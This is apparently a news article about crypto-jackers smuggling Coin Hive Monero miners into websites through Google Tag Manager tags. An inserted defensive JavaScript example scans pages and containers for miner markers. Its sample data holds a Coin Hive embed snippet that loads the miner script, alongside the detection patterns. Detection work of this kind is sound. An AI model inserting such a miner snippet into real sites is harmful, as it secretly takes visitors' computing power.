Crypto-jackers enlist Google Tag Manager to smuggle alt-coin miners

Ad giant has malware detection in its script-hosting service... but Coin Hive isn't flagged

Crypto-jackers using Coin Hive code to secretly mine Monero via computing power supplied by the unsuspecting have found Google Tag Manager to be a convenient means of distribution.

Security researcher Troy Mursch told The Register that he recently found Coin Hive's free-to-use JavaScript running on the Globovisión website – Globovisión being a 24-hour telly station for Venezuela and Latin America.

The code was invisibly spawned, he said, "from the embedded Google Tag Manager script

Google Tag Manager allows marketers, or anyone else with a website, to create code – dubbed a tag – that can be placed in webpages to dynamically inject JavaScript snippets rather than using hardcoded JavaScript in those files.

Google's service, handily enough, provides more control and flexibility than static code delivery.

Because the code gets served by Google Tag Manager, it's not present in the source files on a web server. The JavaScript file and appended parameter gtm.js?id=GTM-KCDXG2D don't say anything about the function of the code invoked. Essentially, miscreants are hacking websites and quietly adding Google-hosted tags that contain the malicious coin-mining code, thus obfuscating the source of the scripts.
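For defenders, the practical consequence is that a scan of the page source finds nothing, so the container each page loads has to be inspected as well. The sketch below is an added example, not code from the article or from Mursch: the sample page, the sample container body and its layout are constructed (not Google's real container format), and the marker strings are those of Coin Hive's public embed snippet.

```javascript
// Added example. SAMPLE_HTML and SAMPLE_CONTAINER are constructed for illustration.
const GTM_ID = /\bGTM-[A-Z0-9]{4,}\b/g;

// Strings from Coin Hive's public embed snippet (loader file, host, API object).
const MINER_MARKERS = [
  { name: 'coinhive.min.js loader', re: /coinhive\.min\.js/i },
  { name: 'Coin Hive host', re: /coin-?hive\.com/i },
  { name: 'CoinHive.Anonymous call', re: /CoinHive\.Anonymous/ },
];

// Tag HTML sits inside escaped JS strings; undo \uXXXX and \/ before matching.
function unescapeJs(text) {
  return text
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)))
    .replace(/\\\//g, '/');
}

// Every distinct container ID referenced by the page (loader script or noscript iframe).
function findContainerIds(html) {
  return [...new Set(html.match(GTM_ID) || [])];
}

function findMinerMarkers(text) {
  const plain = unescapeJs(text);
  return MINER_MARKERS.filter(m => m.re.test(plain)).map(m => m.name);
}

// fetchContainer(id) returns the body of gtm.js?id=<id>; injected so this runs offline.
function auditPage(html, fetchContainer) {
  const report = { inPageSource: findMinerMarkers(html), containers: {} };
  for (const id of findContainerIds(html)) {
    report.containers[id] = findMinerMarkers(fetchContainer(id));
  }
  return report;
}

const SAMPLE_HTML = `<head><script>(function(w,d,s,l,i){/* standard GTM loader */})
(window,document,'script','dataLayer','GTM-KCDXG2D');</script></head>
<body><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KCDXG2D">
</iframe></noscript></body>`;

const SAMPLE_CONTAINER = String.raw`{"tags":[{"html":
"\u003Cscript src=\"https:\/\/coinhive.com\/lib\/coinhive.min.js\"\u003E\u003C\/script\u003E
\u003Cscript\u003Enew CoinHive.Anonymous('CONSTRUCTED_KEY')\u003C\/script\u003E"}]}`;

console.log(JSON.stringify(auditPage(SAMPLE_HTML, () => SAMPLE_CONTAINER), null, 2));
```

On the constructed input the page source reports no markers while the container reports all three, which is the gap the article describes.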

Mursch said the Globovisión mining code was removed within an hour of discovery, and it's not clear how it got there. He found the Monero-crafting JS, he said, while reviewing another crypto-jacking incident with a Brazilian singer's website.

Google did not immediately respond to a request for comment.

A month ago, when The Register reported that Google short URLs were being co-opted for Monero, there were about 113,000 instances of cryptonight mining. Presently, there are about 180,000.

The Chocolate Factory's Tag Manager Terms of Service prohibits misuse, and the ad distribution biz has systems in place to look for malware in tags and prevent them from firing when found.

"In most cases, affected users are unaware that there are tags serving malware from their containers," the web giant explained on its website. "Usually through no fault of your own, a network provider becomes malware infected when they install 3rd party libraries or templates onto their websites, and subsequently transmit that malware to your site via the custom HTML tag that you published onto your website via Tag Manager."

That being the case, it appears that Google either cannot detect Coin Hive code through Tag Manager or it doesn't consider it to be malicious. Most ad blockers, as well as antivirus tools, kill Coin Hive's code on sight these days.

Coin Hive's development team did not respond to a request for comment.

Noting that crypto-jacking tops Malwarebytes' list of security ills likely to be visited upon businesses and consumers in 2018, Mursch said: "We should expect this trend to continue."


Biting the hand that feeds IT © 1998–2017
